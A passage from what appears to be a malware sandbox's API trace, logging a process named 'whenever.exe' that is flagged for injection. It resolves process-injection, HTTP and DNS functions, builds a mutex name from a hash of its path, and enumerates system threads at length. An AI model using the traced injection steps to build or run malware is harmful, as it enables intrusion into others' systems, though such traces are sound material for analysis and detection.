lpte=0x22cf7c8) returned 1 [0168.567] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.567] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.568] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.568] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.568] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.569] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.569] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.569] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.569] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.570] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.570] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.570] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.570] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.571] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.571] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.571] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.572] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.572] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.572] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.572] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.573] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.573] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.573] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.574] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.574] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.574] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.574] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.575] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.575] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.575] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.575] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.576] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0168.696] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x244) returned 0x8c [0168.696] ResumeThread (hThread=0x8c) returned 0x1 [0168.696] CloseHandle (hObject=0x8c) returned 1 [0168.696] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c8) returned 0x8c [0168.696] ResumeThread (hThread=0x8c) returned 0x1 [0168.696] CloseHandle (hObject=0x8c) returned 1 [0168.822] CloseHandle (hObject=0x88) returned 1 [0168.822] VirtualQuery (in: lpAddress=0x780988, lpBuffer=0x22cf7bc, dwLength=0x1c | out: lpBuffer=0x22cf7bc*(BaseAddress=0x780000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.822] GetProcessHeap () returned 0x760000 [0168.822] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x780988 | out: hHeap=0x760000) returned 1 [0168.823] VirtualQuery (in: lpAddress=0x780878, lpBuffer=0x22cf7bc, dwLength=0x1c | out: lpBuffer=0x22cf7bc*(BaseAddress=0x780000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.823] GetProcessHeap () returned 0x760000 [0168.823] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x780878 | out: hHeap=0x760000) returned 1 [0168.823] RtlExitUserThread (Status=0x0) Process: id = "25" image_name = "whenever.exe" filename = "c:\\program files\\microsoft office\\whenever.exe" page_root = "0x668bd000" os_pid = "0x2c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Microsoft Office\\whenever.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 235 os_tid = 0x9c4 Thread: id = 236 os_tid = 0x210 Thread: id = 238 os_tid = 0xa00 [0167.595] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0167.595] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0167.595] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0167.595] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0167.596] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0167.597] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0167.598] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0167.598] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0167.599] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0167.600] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0167.606] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0167.606] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0167.606] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0167.697] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0167.698] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0167.698] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0167.698] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0167.698] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0167.698] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0167.698] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0167.698] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0167.698] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0167.698] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0167.699] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0167.699] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0167.701] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0167.701] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0167.701] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0167.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0167.702] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0167.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0167.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0167.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0167.703] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x222fb18 | out: lpflOldProtect=0x222fb18*=0x40) returned 1 [0167.703] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x222fb18 | out: lpflOldProtect=0x222fb18*=0x4) returned 1 [0167.704] VirtualQuery (in: lpAddress=0xf0016, lpBuffer=0x222fb10, dwLength=0x1c | out: lpBuffer=0x222fb10*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0167.704] GetProcessHeap () returned 0x760000 [0167.704] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x364) returned 0x7805a8 [0167.704] RtlMoveMemory (in: Destination=0x7805a8, Source=0xf0016, Length=0x363 | out: Destination=0x7805a8) [0167.704] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xf0016) returned 0x0 [0167.704] GetCurrentProcessId () returned 0x2c8 [0167.704] GetProcessHeap () returned 0x760000 [0167.704] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x105) returned 0x780918 [0167.704] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x780918, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\whenever.exe" (normalized: "c:\\program files\\microsoft office\\whenever.exe")) returned 0x2e [0167.704] GetProcessHeap () returned 0x760000 [0167.704] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x105) returned 0x780a28 [0167.704] GetCurrentProcessId () returned 0x2c8 [0167.705] wsprintfA (in: param_1=0x780a28, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Microsoft Office\\whenever.exe3708421247123") returned 59 [0167.705] CryptAcquireContextA (in: phProv=0x222fb14, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x222fb14*=0x780b78) returned 1 [0167.719] CryptCreateHash (in: hProv=0x780b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x222fb18 | out: phHash=0x222fb18) returned 1 [0167.719] lstrlenA (lpString="C:\\Program Files\\Microsoft Office\\whenever.exe3708421247123") returned 59 [0167.720] CryptHashData (hHash=0x781480, pbData=0x780a28, dwDataLen=0x3b, dwFlags=0x0) returned 1 [0167.720] CryptGetHashParam (in: hHash=0x781480, dwParam=0x2, pbData=0x222fb04, pdwDataLen=0x222fb1c, dwFlags=0x0 | out: pbData=0x222fb04, pdwDataLen=0x222fb1c) returned 1 [0167.720] wsprintfA (in: param_1=0x780a28, param_2="%02X" | out: param_1="55") returned 2 [0167.720] wsprintfA (in: param_1=0x780a2a, param_2="%02X" | out: param_1="2F") returned 2 [0167.720] wsprintfA (in: param_1=0x780a2c, param_2="%02X" | out: param_1="68") returned 2 [0167.720] wsprintfA (in: param_1=0x780a2e, param_2="%02X" | out: param_1="53") returned 2 [0167.720] wsprintfA (in: param_1=0x780a30, param_2="%02X" | out: param_1="E4") returned 2 [0167.720] wsprintfA (in: param_1=0x780a32, param_2="%02X" | out: param_1="8E") returned 2 [0167.720] wsprintfA (in: param_1=0x780a34, param_2="%02X" | out: param_1="7A") returned 2 [0167.720] wsprintfA (in: param_1=0x780a36, param_2="%02X" | out: param_1="F7") returned 2 [0167.720] wsprintfA (in: param_1=0x780a38, param_2="%02X" | out: param_1="59") returned 2 [0167.720] wsprintfA (in: param_1=0x780a3a, param_2="%02X" | out: param_1="B9") returned 2 [0167.720] wsprintfA (in: param_1=0x780a3c, param_2="%02X" | out: param_1="0A") returned 2 [0167.720] wsprintfA (in: param_1=0x780a3e, param_2="%02X" | out: param_1="92") returned 2 [0167.720] wsprintfA (in: param_1=0x780a40, param_2="%02X" | out: param_1="7B") returned 2 [0167.720] wsprintfA (in: param_1=0x780a42, param_2="%02X" | out: param_1="2C") returned 2 [0167.720] wsprintfA (in: param_1=0x780a44, param_2="%02X" | out: param_1="73") returned 2 [0167.720] wsprintfA (in: param_1=0x780a46, param_2="%02X" | out: param_1="B0") returned 2 [0167.720] CryptDestroyHash (hHash=0x781480) returned 1 [0167.720] CryptReleaseContext (hProv=0x780b78, dwFlags=0x0) returned 1 [0167.720] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="552F6853E48E7AF759B90A927B2C73B0") returned 0x80 [0167.720] GetLastError () returned 0x0 [0167.720] Sleep (dwMilliseconds=0x1f4) [0168.223] GetCurrentProcessId () returned 0x2c8 [0168.223] GetCurrentThreadId () returned 0xa00 [0168.224] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0168.226] Thread32First (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.226] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.227] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.227] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.227] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.227] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.228] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.228] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.228] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.228] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.229] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.229] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.229] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.230] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.230] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.230] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.230] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.231] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.231] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.231] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.231] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.232] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.232] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.232] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.233] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.233] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.233] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.233] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.234] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.234] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.234] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.235] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.235] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.235] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.235] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.236] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.236] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.236] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.236] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.237] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.237] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.237] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.238] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.238] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.238] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.238] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.239] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.319] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.319] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.320] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.320] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.320] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.321] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.321] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.321] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.321] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.322] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.322] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.322] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.322] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.323] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.323] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.323] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.324] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.324] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.324] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.324] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.325] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.325] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.325] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.326] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.326] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.326] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.326] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.327] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.327] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.327] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.328] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.328] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.328] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.328] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.329] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.329] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.329] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.329] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.330] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.330] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.330] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.331] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.331] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.331] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.331] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.332] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.332] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.332] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.333] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.333] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.333] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.334] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.334] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.334] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.335] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.335] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.335] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.335] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.336] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.336] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.336] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.336] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.337] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.337] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.337] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.338] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.338] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.338] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.338] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.339] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.339] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.339] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.339] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.340] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.340] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.340] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.341] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.341] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.341] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.341] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.342] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.342] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.342] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.343] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.343] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.343] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.343] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.344] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.344] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.344] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.344] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.345] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.345] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.345] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.346] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.346] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.346] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.346] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.347] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.347] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.347] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.348] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.348] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.348] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.349] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 